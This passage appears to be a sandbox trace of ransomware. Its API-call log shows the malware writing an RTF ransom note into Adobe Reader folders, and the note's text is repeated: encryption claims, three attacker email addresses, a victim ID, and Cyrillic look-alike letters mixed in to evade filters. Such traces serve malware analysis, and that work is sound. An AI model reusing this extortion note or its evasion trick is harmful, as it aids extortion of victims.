\\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 7247 [0065.724] WriteFile (in: hFile=0x1dc, lpBuffer=0x2867358*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x2867358*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0065.725] CloseHandle (hObject=0x1dc) returned 1 [0065.726] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ITA\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ita\\bg85_info.rtf")) returned 0xffffffff [0065.726] GetLastError () returned 0x2 [0065.726] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ITA\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ita\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0065.727] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0065.727] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0065.727] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS 